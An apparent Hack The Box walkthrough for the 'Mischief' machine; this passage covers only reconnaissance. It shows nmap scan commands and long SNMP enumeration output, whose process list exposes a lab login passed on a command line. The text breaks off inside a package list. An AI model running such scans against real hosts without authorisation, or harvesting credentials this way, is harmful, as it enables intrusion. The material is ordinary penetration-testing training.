This post documents the complete walkthrough of Mischief, a retired vulnerable VM created by trickster0, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
Mischief is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a nmap scan to establish the available services in the host.
# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 10.10.10.92
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
3366/tcp open caldav syn-ack ttl 63 Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth:
| HTTP/1.0 401 Unauthorized\x0D
|_ Basic realm=Test
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html).
Following the route of 3366/tcp, I stumbled upon Python’s SimpleHTTPServer with Basic authentication enabled. I had no choice but to dig deeper further for UDP open ports. The first go-to port has to be SNMP or 161/udp.
# nmap -n -v -Pn -sU -p161 -A --reason -oN udp.txt 10.10.10.92
...
PORT STATE SERVICE REASON VERSION
161/udp open snmp udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 18m28s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Status: up
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:5e:f7 (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
| Status: up
|_ Traffic stats: 5.94 Mb sent, 23.42 Mb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:37256 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes:
| 1:
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2:
| Name: kthreadd
| 4:
| Name: kworker/0:0H
| 5:
| Name: kworker/u2:0
| 6:
| Name: mm_percpu_wq
| 7:
| Name: ksoftirqd/0
| 8:
| Name: rcu_sched
| 9:
| Name: rcu_bh
| 10:
| Name: migration/0
| 11:
| Name: watchdog/0
| 12:
| Name: cpuhp/0
| 13:
| Name: kdevtmpfs
| 14:
| Name: netns
| 15:
| Name: rcu_tasks_kthre
| 16:
| Name: kauditd
| 17:
| Name: khungtaskd
| 18:
| Name: oom_reaper
| 19:
| Name: writeback
| 20:
| Name: kcompactd0
| 21:
| Name: ksmd
| 22:
| Name: khugepaged
| 23:
| Name: crypto
| 24:
| Name: kintegrityd
| 25:
| Name: kblockd
| 26:
| Name: ata_sff
| 27:
| Name: md
| 28:
| Name: edac-poller
| 29:
| Name: devfreq_wq
| 30:
| Name: watchdogd
| 31:
| Name: kworker/u2:1
| 32:
| Name: kworker/0:1
| 34:
| Name: kswapd0
| 35:
| Name: ecryptfs-kthrea
| 77:
| Name: kthrotld
| 78:
| Name: acpi_thermal_pm
| 79:
| Name: scsi_eh_0
| 80:
| Name: scsi_tmf_0
| 81:
| Name: scsi_eh_1
| 82:
| Name: scsi_tmf_1
| 88:
| Name: ipv6_addrconf
| 97:
| Name: kstrp
| 114:
| Name: charger_manager
| 125:
| Name: kworker/0:2
| 164:
| Name: mpt_poll_0
| 165:
| Name: mpt/0
| 194:
| Name: scsi_eh_2
| 197:
| Name: scsi_tmf_2
| 205:
| Name: kworker/0:1H
| 206:
| Name: ttm_swap
| 207:
| Name: irq/16-vmwgfx
| 274:
| Name: raid5wq
| 324:
| Name: jbd2/sda2-8
| 325:
| Name: ext4-rsv-conver
| 372:
| Name: vmtoolsd
| Path: /usr/bin/vmtoolsd
| 375:
| Name: systemd-journal
| Path: /lib/systemd/systemd-journald
| 378:
| Name: iscsi_eh
| 382:
| Name: lvmetad
| Path: /sbin/lvmetad
| Params: -f
| 389:
| Name: systemd-udevd
| Path: /lib/systemd/systemd-udevd
| 392:
| Name: ib-comp-wq
| 393:
| Name: ib_mcast
| 394:
| Name: ib_nl_sa_wq
| 405:
| Name: rdma_cm
| 476:
| Name: systemd-network
| Path: /lib/systemd/systemd-networkd
| 515:
| Name: systemd-resolve
| Path: /lib/systemd/systemd-resolved
| 517:
| Name: systemd-timesyn
| Path: /lib/systemd/systemd-timesyncd
| 536:
| Name: accounts-daemon
| Path: /usr/lib/accountsservice/accounts-daemon
| 541:
| Name: atd
| Path: /usr/sbin/atd
| Params: -f
| 542:
| Name: systemd-logind
| Path: /lib/systemd/systemd-logind
| 543:
| Name: rsyslogd
| Path: /usr/sbin/rsyslogd
| Params: -n
| 549:
| Name: cron
| Path: /usr/sbin/cron
| Params: -f
| 550:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 551:
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 553:
| Name: lxcfs
| Path: /usr/bin/lxcfs
| Params: /var/lib/lxcfs/
| 557:
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 560:
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 563:
| Name: networkd-dispat
| Path: /usr/bin/python3
| Params: /usr/bin/networkd-dispatcher
| 564:
| Name: dbus-daemon
| Path: /usr/bin/dbus-daemon
| Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
| 572:
| Name: VGAuthService
| Path: /usr/bin/VGAuthService
| 574:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
| 590:
| Name: polkitd
| Path: /usr/lib/policykit-1/polkitd
| Params: --no-debug
| 632:
| Name: mysqld
| Path: /usr/sbin/mysqld
| Params: --daemonize --pid-file=/run/mysqld/mysqld.pid
| 694:
| Name: iscsid
| Path: /sbin/iscsid
| 695:
| Name: iscsid
| Path: /sbin/iscsid
| 701:
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
| 739:
| Name: agetty
| Path: /sbin/agetty
| Params: -o -p -- \u --noclear tty1 linux
| 778:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 781:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 782:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 783:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 784:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 785:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 979:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 1005:
| Name: sshd
| Path: sshd: loki [priv]
| 1009:
| Name: systemd
| Path: /lib/systemd/systemd
| Params: --user
| 1014:
| Name: (sd-pam)
| Path: (sd-pam)
| 1134:
| Name: sshd
| Path: sshd: [email protected]/0
| 1137:
| Name: bash
| Path: -bash
| 1161:
| Name: sshd
| Path: sshd: loki [priv]
| 1242:
| Name: sshd
| Path: sshd: [email protected]/1
| 1243:
| Name: bash
| Path: -bash
| 1268:
|_ Name: kworker/u2:2
| snmp-sysdescr: Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
|_ System uptime: 18m28.52s (110852 timeticks)
| snmp-win32-software:
| accountsservice-0.6.45-1ubuntu1; 0-01-01T00:00:00
| acl-2.2.52-3build1; 0-01-01T00:00:00
| acpid-1:2.0.28-1ubuntu1; 0-01-01T00:00:00
| adduser-3.116ubuntu1; 0-01-01T00:00:00
| apache2-2.4.29-1ubuntu4.1; 0-01-01T00:00:00
| apache2-bin-2.4.29-1ubuntu4.1; 0-01-01T00:00:00
| apache2-data-2.4.29-1ubuntu4.1; 0-01-01T00:00:00
| apache2-utils-2.4.29-1ubuntu4.1; 0-01-01T00:00:00
| apparmor-2.12-4ubuntu5; 0-01-01T00:00:00
| apport-2.20.9-0ubuntu7; 0-01-01T00:00:00
| apport-symptoms-0.20; 0-01-01T00:00:00
| apt-1.6.1; 0-01-01T00:00:00
| apt-utils-1.6.1; 0-01-01T00:00:00
| at-3.1.20-3.1ubuntu2; 0-01-01T00:00:00
| base-files-10.1ubuntu2; 0-01-01T00:00:00
| base-passwd-3.5.44; 0-01-01T00:00:00
| bash-4.4.18-2ubuntu1; 0-01-01T00:00:00
| bash-completion-1:2.8-1ubuntu1; 0-01-01T00:00:00
| bc-1.07.1-2; 0-01-01T00:00:00
| bcache-tools-1.0.8-2build1; 0-01-01T00:00:00
| bind9-host-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| binutils-2.30-15ubuntu1; 0-01-01T00:00:00
| binutils-common-2.30-15ubuntu1; 0-01-01T00:00:00
| binutils-x86-64-linux-gnu-2.30-15ubuntu1; 0-01-01T00:00:00
| bsdmainutils-11.1.2ubuntu1; 0-01-01T00:00:00
| bsdutils-1:2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| btrfs-progs-4.15.1-1build1; 0-01-01T00:00:00
| btrfs-tools-4.15.1-1build1; 0-01-01T00:00:00
| build-essential-12.4ubuntu1; 0-01-01T00:00:00
| busybox-initramfs-1:1.27.2-2ubuntu3; 0-01-01T00:00:00
| busybox-static-1:1.27.2-2ubuntu3; 0-01-01T00:00:00
| byobu-5.125-0ubuntu1; 0-01-01T00:00:00
| bzip2-1.0.6-8.1; 0-01-01T00:00:00
| ca-certificates-20180409; 0-01-01T00:00:00
| cloud-guest-utils-0.30-0ubuntu5; 0-01-01T00:00:00
| cloud-init-18.2-14-g6d48d265-0ubuntu1; 0-01-01T00:00:00
| cloud-initramfs-copymods-0.40ubuntu1; 0-01-01T00:00:00
| cloud-initramfs-dyn-netconf-0.40ubuntu1; 0-01-01T00:00:00
| command-not-found-18.04.4; 0-01-01T00:00:00
| command-not-found-data-18.04.4; 0-01-01T00:00:00
| console-setup-1.178ubuntu2; 0-01-01T00:00:00
| console-setup-linux-1.178ubuntu2; 0-01-01T00:00:00
| coreutils-8.28-1ubuntu1; 0-01-01T00:00:00
| cpio-2.12+dfsg-6; 0-01-01T00:00:00
| cpp-4:7.3.0-3ubuntu2; 0-01-01T00:00:00
| cpp-7-7.3.0-16ubuntu3; 0-01-01T00:00:00
| crda-3.18-1build1; 0-01-01T00:00:00
| cron-3.0pl1-128.1ubuntu1; 0-01-01T00:00:00
| cryptsetup-2:2.0.2-1ubuntu1; 0-01-01T00:00:00
| cryptsetup-bin-2:2.0.2-1ubuntu1; 0-01-01T00:00:00
| curl-7.58.0-2ubuntu3; 0-01-01T00:00:00
| dash-0.5.8-2.10; 0-01-01T00:00:00
| dbus-1.12.2-1ubuntu1; 0-01-01T00:00:00
| debconf-1.5.66; 0-01-01T00:00:00
| debconf-i18n-1.5.66; 0-01-01T00:00:00
| debianutils-4.8.4; 0-01-01T00:00:00
| diffutils-1:3.6-1; 0-01-01T00:00:00
| dirmngr-2.2.4-1ubuntu1; 0-01-01T00:00:00
| distro-info-data-0.37ubuntu0.1; 0-01-01T00:00:00
| dmeventd-2:1.02.145-4.1ubuntu3; 0-01-01T00:00:00
| dmidecode-3.1-1; 0-01-01T00:00:00
| dmsetup-2:1.02.145-4.1ubuntu3; 0-01-01T00:00:00
| dns-root-data-2018013001; 0-01-01T00:00:00
| dnsmasq-base-2.79-1; 0-01-01T00:00:00
| dnsutils-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| dosfstools-4.1-1; 0-01-01T00:00:00
| dpkg-1.19.0.5ubuntu2; 0-01-01T00:00:00
| dpkg-dev-1.19.0.5ubuntu2; 0-01-01T00:00:00
| e2fsprogs-1.44.1-1; 0-01-01T00:00:00
| eatmydata-105-6; 0-01-01T00:00:00
| ebtables-2.0.10.4-3.5ubuntu2; 0-01-01T00:00:00
| ed-1.10-2.1; 0-01-01T00:00:00
| eject-2.1.5+deb1+cvs20081104-13.2; 0-01-01T00:00:00
| ethtool-1:4.15-0ubuntu1; 0-01-01T00:00:00
| fakeroot-1.22-2ubuntu1; 0-01-01T00:00:00
| fdisk-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| file-1:5.32-2; 0-01-01T00:00:00
| findutils-4.6.0+git+20170828-2; 0-01-01T00:00:00
| fonts-ubuntu-console-0.83-2; 0-01-01T00:00:00
| friendly-recovery-0.2.38; 0-01-01T00:00:00
| ftp-0.17-34; 0-01-01T00:00:00
| fuse-2.9.7-1ubuntu1; 0-01-01T00:00:00
| g++-4:7.3.0-3ubuntu2; 0-01-01T00:00:00
| g++-7-7.3.0-16ubuntu3; 0-01-01T00:00:00
| gawk-1:4.1.4+dfsg-1build1; 0-01-01T00:00:00
| gcc-4:7.3.0-3ubuntu2; 0-01-01T00:00:00
| gcc-7-7.3.0-16ubuntu3; 0-01-01T00:00:00
| gcc-7-base-7.3.0-16ubuntu3; 0-01-01T00:00:00
| gcc-8-base-8-20180414-1ubuntu2; 0-01-01T00:00:00
| gdisk-1.0.3-1; 0-01-01T00:00:00
| geoip-database-20180315-1; 0-01-01T00:00:00
| gettext-base-0.19.8.1-6; 0-01-01T00:00:00
| gir1.2-glib-2.0-1.56.1-1; 0-01-01T00:00:00
| git-1:2.17.0-1ubuntu1; 0-01-01T00:00:00
| git-man-1:2.17.0-1ubuntu1; 0-01-01T00:00:00
| gnupg-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gnupg-l10n-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gnupg-utils-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gpg-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gpg-agent-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gpg-wks-client-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gpg-wks-server-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gpgconf-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gpgsm-2.2.4-1ubuntu1; 0-01-01T00:00:00
| gpgv-2.2.4-1ubuntu1; 0-01-01T00:00:00
| grep-3.1-2; 0-01-01T00:00:00
| groff-base-1.22.3-10; 0-01-01T00:00:00
| grub-common-2.02-2ubuntu8; 0-01-01T00:00:00
| grub-gfxpayload-lists-0.7; 0-01-01T00:00:00
| grub-legacy-ec2-1:1; 0-01-01T00:00:00
| grub-pc-2.02-2ubuntu8; 0-01-01T00:00:00
| grub-pc-bin-2.02-2ubuntu8; 0-01-01T00:00:00
| grub2-common-2.02-2ubuntu8; 0-01-01T00:00:00
| gzip-1.6-5ubuntu1; 0-01-01T00:00:00
| hdparm-9.54+ds-1; 0-01-01T00:00:00
| hostname-3.20; 0-01-01T00:00:00
| htop-2.1.0-3; 0-01-01T00:00:00
| info-6.5.0.dfsg.1-2; 0-01-01T00:00:00
| init-1.51; 0-01-01T00:00:00
| init-system-helpers-1.51; 0-01-01T00:00:00
| initramfs-tools-0.130ubuntu3; 0-01-01T00:00:00
| initramfs-tools-bin-0.130ubuntu3; 0-01-01T00:00:00
| initramfs-tools-core-0.130ubuntu3; 0-01-01T00:00:00
| install-info-6.5.0.dfsg.1-2; 0-01-01T00:00:00
| iproute2-4.15.0-2ubuntu1; 0-01-01T00:00:00
| iptables-1.6.1-2ubuntu2; 0-01-01T00:00:00
| iptables-persistent-1.0.4+nmu2; 0-01-01T00:00:00
| iputils-ping-3:20161105-1ubuntu2; 0-01-01T00:00:00
| iputils-tracepath-3:20161105-1ubuntu2; 0-01-01T00:00:00
| irqbalance-1.3.0-0.1; 0-01-01T00:00:00
| isc-dhcp-client-4.3.5-3ubuntu7; 0-01-01T00:00:00
| isc-dhcp-common-4.3.5-3ubuntu7; 0-01-01T00:00:00
| iso-codes-3.79-1; 0-01-01T00:00:00
| iw-4.14-0.1; 0-01-01T00:00:00
| kbd-2.0.4-2ubuntu1; 0-01-01T00:00:00
| keyboard-configuration-1.178ubuntu2; 0-01-01T00:00:00
| klibc-utils-2.0.4-9ubuntu2; 0-01-01T00:00:00
| kmod-24-1ubuntu3; 0-01-01T00:00:00
| krb5-locales-1.16-2build1; 0-01-01T00:00:00
| landscape-common-18.01-0ubuntu3; 0-01-01T00:00:00
| language-selector-common-0.188; 0-01-01T00:00:00
| less-487-0.1; 0-01-01T00:00:00
| libaccountsservice0-0.6.45-1ubuntu1; 0-01-01T00:00:00
| libacl1-2.2.52-3build1; 0-01-01T00:00:00
| libaio1-0.3.110-5; 0-01-01T00:00:00
| libalgorithm-diff-perl-1.19.03-1; 0-01-01T00:00:00
| libalgorithm-diff-xs-perl-0.04-5; 0-01-01T00:00:00
| libalgorithm-merge-perl-0.08-3; 0-01-01T00:00:00
| libapache2-mod-php-1:7.2+60ubuntu1; 0-01-01T00:00:00
| libapache2-mod-php7.2-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| libapparmor1-2.12-4ubuntu5; 0-01-01T00:00:00
| libapr1-1.6.3-2; 0-01-01T00:00:00
| libaprutil1-1.6.1-2; 0-01-01T00:00:00
| libaprutil1-dbd-sqlite3-1.6.1-2; 0-01-01T00:00:00
| libaprutil1-ldap-1.6.1-2; 0-01-01T00:00:00
| libapt-inst2.0-1.6.1; 0-01-01T00:00:00
| libapt-pkg5.0-1.6.1; 0-01-01T00:00:00
| libargon2-0-0~20161029-1.1; 0-01-01T00:00:00
| libasan4-7.3.0-16ubuntu3; 0-01-01T00:00:00
| libasn1-8-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libassuan0-2.5.1-2; 0-01-01T00:00:00
| libatm1-1:2.5.1-2build1; 0-01-01T00:00:00
| libatomic1-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libattr1-1:2.4.47-2build1; 0-01-01T00:00:00
| libaudit-common-1:2.8.2-1ubuntu1; 0-01-01T00:00:00
| libaudit1-1:2.8.2-1ubuntu1; 0-01-01T00:00:00
| libbind9-160-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libbinutils-2.30-15ubuntu1; 0-01-01T00:00:00
| libblkid1-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| libbsd0-0.8.7-1; 0-01-01T00:00:00
| libbz2-1.0-1.0.6-8.1; 0-01-01T00:00:00
| libc-bin-2.27-3ubuntu1; 0-01-01T00:00:00
| libc-dev-bin-2.27-3ubuntu1; 0-01-01T00:00:00
| libc6-2.27-3ubuntu1; 0-01-01T00:00:00
| libc6-dev-2.27-3ubuntu1; 0-01-01T00:00:00
| libcap-ng0-0.7.7-3.1; 0-01-01T00:00:00
| libcap2-1:2.25-1.2; 0-01-01T00:00:00
| libcap2-bin-1:2.25-1.2; 0-01-01T00:00:00
| libcc1-0-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libcgi-fast-perl-1:2.13-1; 0-01-01T00:00:00
| libcgi-pm-perl-4.38-1; 0-01-01T00:00:00
| libcilkrts5-7.3.0-16ubuntu3; 0-01-01T00:00:00
| libcom-err2-1.44.1-1; 0-01-01T00:00:00
| libcryptsetup12-2:2.0.2-1ubuntu1; 0-01-01T00:00:00
| libcurl3-gnutls-7.58.0-2ubuntu3; 0-01-01T00:00:00
| libcurl4-7.58.0-2ubuntu3; 0-01-01T00:00:00
| libdb5.3-5.3.28-13.1ubuntu1; 0-01-01T00:00:00
| libdbus-1-3-1.12.2-1ubuntu1; 0-01-01T00:00:00
| libdbus-glib-1-2-0.110-2; 0-01-01T00:00:00
| libdebconfclient0-0.213ubuntu1; 0-01-01T00:00:00
| libdevmapper-event1.02.1-2:1.02.145-4.1ubuntu3; 0-01-01T00:00:00
| libdevmapper1.02.1-2:1.02.145-4.1ubuntu3; 0-01-01T00:00:00
| libdns-export1100-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libdns1100-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libdpkg-perl-1.19.0.5ubuntu2; 0-01-01T00:00:00
| libdrm-common-2.4.91-2; 0-01-01T00:00:00
| libdrm2-2.4.91-2; 0-01-01T00:00:00
| libdumbnet1-1.12-7build1; 0-01-01T00:00:00
| libeatmydata1-105-6; 0-01-01T00:00:00
| libedit2-3.1-20170329-1; 0-01-01T00:00:00
| libelf1-0.170-0.4; 0-01-01T00:00:00
| libencode-locale-perl-1.05-1; 0-01-01T00:00:00
| liberror-perl-0.17025-1; 0-01-01T00:00:00
| libestr0-0.1.10-2.1; 0-01-01T00:00:00
| libevent-2.1-6-2.1.8-stable-4build1; 0-01-01T00:00:00
| libevent-core-2.1-6-2.1.8-stable-4build1; 0-01-01T00:00:00
| libexpat1-2.2.5-3; 0-01-01T00:00:00
| libexpat1-dev-2.2.5-3; 0-01-01T00:00:00
| libext2fs2-1.44.1-1; 0-01-01T00:00:00
| libfakeroot-1.22-2ubuntu1; 0-01-01T00:00:00
| libfastjson4-0.99.8-2; 0-01-01T00:00:00
| libfcgi-perl-0.78-2build1; 0-01-01T00:00:00
| libfdisk1-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| libffi6-3.2.1-8; 0-01-01T00:00:00
| libfile-fcntllock-perl-0.22-3build2; 0-01-01T00:00:00
| libfreetype6-2.8.1-2ubuntu2; 0-01-01T00:00:00
| libfribidi0-0.19.7-2; 0-01-01T00:00:00
| libfuse2-2.9.7-1ubuntu1; 0-01-01T00:00:00
| libgcc-7-dev-7.3.0-16ubuntu3; 0-01-01T00:00:00
| libgcc1-1:8-20180414-1ubuntu2; 0-01-01T00:00:00
| libgcrypt20-1.8.1-4ubuntu1; 0-01-01T00:00:00
| libgdbm-compat4-1.14.1-6; 0-01-01T00:00:00
| libgdbm5-1.14.1-6; 0-01-01T00:00:00
| libgeoip1-1.6.12-1; 0-01-01T00:00:00
| libgirepository-1.0-1-1.56.1-1; 0-01-01T00:00:00
| libglib2.0-0-2.56.1-2ubuntu1; 0-01-01T00:00:00
| libglib2.0-data-2.56.1-2ubuntu1; 0-01-01T00:00:00
| libgmp10-2:6.1.2+dfsg-2; 0-01-01T00:00:00
| libgnutls30-3.5.18-1ubuntu1; 0-01-01T00:00:00
| libgomp1-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libgpg-error0-1.27-6; 0-01-01T00:00:00
| libgpm2-1.20.7-5; 0-01-01T00:00:00
| libgssapi-krb5-2-1.16-2build1; 0-01-01T00:00:00
| libgssapi3-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libhcrypto4-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libheimbase1-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libheimntlm0-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libhogweed4-3.4-1; 0-01-01T00:00:00
| libhtml-parser-perl-3.72-3build1; 0-01-01T00:00:00
| libhtml-tagset-perl-3.20-3; 0-01-01T00:00:00
| libhtml-template-perl-2.97-1; 0-01-01T00:00:00
| libhttp-date-perl-6.02-1; 0-01-01T00:00:00
| libhttp-message-perl-6.14-1; 0-01-01T00:00:00
| libhx509-5-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libicu60-60.2-3ubuntu3; 0-01-01T00:00:00
| libidn11-1.33-2.1ubuntu1; 0-01-01T00:00:00
| libidn2-0-2.0.4-1.1build2; 0-01-01T00:00:00
| libio-html-perl-1.001-1; 0-01-01T00:00:00
| libip4tc0-1.6.1-2ubuntu2; 0-01-01T00:00:00
| libip6tc0-1.6.1-2ubuntu2; 0-01-01T00:00:00
| libiptc0-1.6.1-2ubuntu2; 0-01-01T00:00:00
| libirs160-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libisc-export169-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libisc169-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libisccc160-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libisccfg160-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| libisl19-0.19-1; 0-01-01T00:00:00
| libisns0-0.97-2build1; 0-01-01T00:00:00
| libitm1-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libjson-c3-0.12.1-1.3; 0-01-01T00:00:00
| libk5crypto3-1.16-2build1; 0-01-01T00:00:00
| libkeyutils1-1.5.9-9.2ubuntu2; 0-01-01T00:00:00
| libklibc-2.0.4-9ubuntu2; 0-01-01T00:00:00
| libkmod2-24-1ubuntu3; 0-01-01T00:00:00
| libkrb5-26-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libkrb5-3-1.16-2build1; 0-01-01T00:00:00
| libkrb5support0-1.16-2build1; 0-01-01T00:00:00
| libksba8-1.3.5-2; 0-01-01T00:00:00
| libldap-2.4-2-2.4.45+dfsg-1ubuntu1; 0-01-01T00:00:00
| libldap-common-2.4.45+dfsg-1ubuntu1; 0-01-01T00:00:00
| liblocale-gettext-perl-1.07-3build2; 0-01-01T00:00:00
| liblsan0-8-20180414-1ubuntu2; 0-01-01T00:00:00
| liblua5.2-0-5.2.4-1.1build1; 0-01-01T00:00:00
| liblvm2app2.2-2.02.176-4.1ubuntu3; 0-01-01T00:00:00
| liblvm2cmd2.02-2.02.176-4.1ubuntu3; 0-01-01T00:00:00
| liblwp-mediatypes-perl-6.02-1; 0-01-01T00:00:00
| liblwres160-1:9.11.3+dfsg-1ubuntu1; 0-01-01T00:00:00
| liblxc-common-3.0.0-0ubuntu2; 0-01-01T00:00:00
| liblxc1-3.0.0-0ubuntu2; 0-01-01T00:00:00
| liblz4-1-0.0~r131-2ubuntu3; 0-01-01T00:00:00
| liblzma5-5.2.2-1.3; 0-01-01T00:00:00
| liblzo2-2-2.08-1.2; 0-01-01T00:00:00
| libmagic-mgc-1:5.32-2; 0-01-01T00:00:00
| libmagic1-1:5.32-2; 0-01-01T00:00:00
| libmnl0-1.0.4-2; 0-01-01T00:00:00
| libmount1-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| libmpc3-1.1.0-1; 0-01-01T00:00:00
| libmpdec2-2.4.2-1ubuntu1; 0-01-01T00:00:00
| libmpfr6-4.0.1-1; 0-01-01T00:00:00
| libmpx2-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libmspack0-0.6-3; 0-01-01T00:00:00
| libncurses5-6.1-1ubuntu1; 0-01-01T00:00:00
| libncursesw5-6.1-1ubuntu1; 0-01-01T00:00:00
| libnetfilter-conntrack3-1.0.6-2; 0-01-01T00:00:00
| libnettle6-3.4-1; 0-01-01T00:00:00
| libnewt0.52-0.52.20-1ubuntu1; 0-01-01T00:00:00
| libnfnetlink0-1.0.1-3; 0-01-01T00:00:00
| libnghttp2-14-1.30.0-1ubuntu1; 0-01-01T00:00:00
| libnih1-1.0.3-6ubuntu2; 0-01-01T00:00:00
| libnl-3-200-3.2.29-0ubuntu3; 0-01-01T00:00:00
| libnl-genl-3-200-3.2.29-0ubuntu3; 0-01-01T00:00:00
| libnpth0-1.5-3; 0-01-01T00:00:00
| libnss-systemd-237-3ubuntu10; 0-01-01T00:00:00
| libntfs-3g88-1:2017.3.23-2; 0-01-01T00:00:00
| libnuma1-2.0.11-2.1; 0-01-01T00:00:00
| libp11-kit0-0.23.9-2; 0-01-01T00:00:00
| libpam-cap-1:2.25-1.2; 0-01-01T00:00:00
| libpam-modules-1.1.8-3.6ubuntu2; 0-01-01T00:00:00
| libpam-modules-bin-1.1.8-3.6ubuntu2; 0-01-01T00:00:00
| libpam-runtime-1.1.8-3.6ubuntu2; 0-01-01T00:00:00
| libpam-systemd-237-3ubuntu10; 0-01-01T00:00:00
| libpam0g-1.1.8-3.6ubuntu2; 0-01-01T00:00:00
| libparted2-3.2-20; 0-01-01T00:00:00
| libpcap0.8-1.8.1-6ubuntu1; 0-01-01T00:00:00
| libpci3-1:3.5.2-1ubuntu1; 0-01-01T00:00:00
| libpcre3-2:8.39-9; 0-01-01T00:00:00
| libperl5.26-5.26.1-6; 0-01-01T00:00:00
| libpipeline1-1.5.0-1; 0-01-01T00:00:00
| libplymouth4-0.9.3-1ubuntu7; 0-01-01T00:00:00
| libpng16-16-1.6.34-1; 0-01-01T00:00:00
| libpolkit-agent-1-0-0.105-20; 0-01-01T00:00:00
| libpolkit-backend-1-0-0.105-20; 0-01-01T00:00:00
| libpolkit-gobject-1-0-0.105-20; 0-01-01T00:00:00
| libpopt0-1.16-11; 0-01-01T00:00:00
| libprocps6-2:3.3.12-3ubuntu1; 0-01-01T00:00:00
| libpsl5-0.19.1-5build1; 0-01-01T00:00:00
| libpython-all-dev-2.7.15~rc1-1; 0-01-01T00:00:00
| libpython-dev-2.7.15~rc1-1; 0-01-01T00:00:00
| libpython-stdlib-2.7.15~rc1-1; 0-01-01T00:00:00
| libpython2.7-2.7.15~rc1-1; 0-01-01T00:00:00
| libpython2.7-dev-2.7.15~rc1-1; 0-01-01T00:00:00
| libpython2.7-minimal-2.7.15~rc1-1; 0-01-01T00:00:00
| libpython2.7-stdlib-2.7.15~rc1-1; 0-01-01T00:00:00
| libpython3-stdlib-3.6.5-3; 0-01-01T00:00:00
| libpython3.6-3.6.5-3; 0-01-01T00:00:00
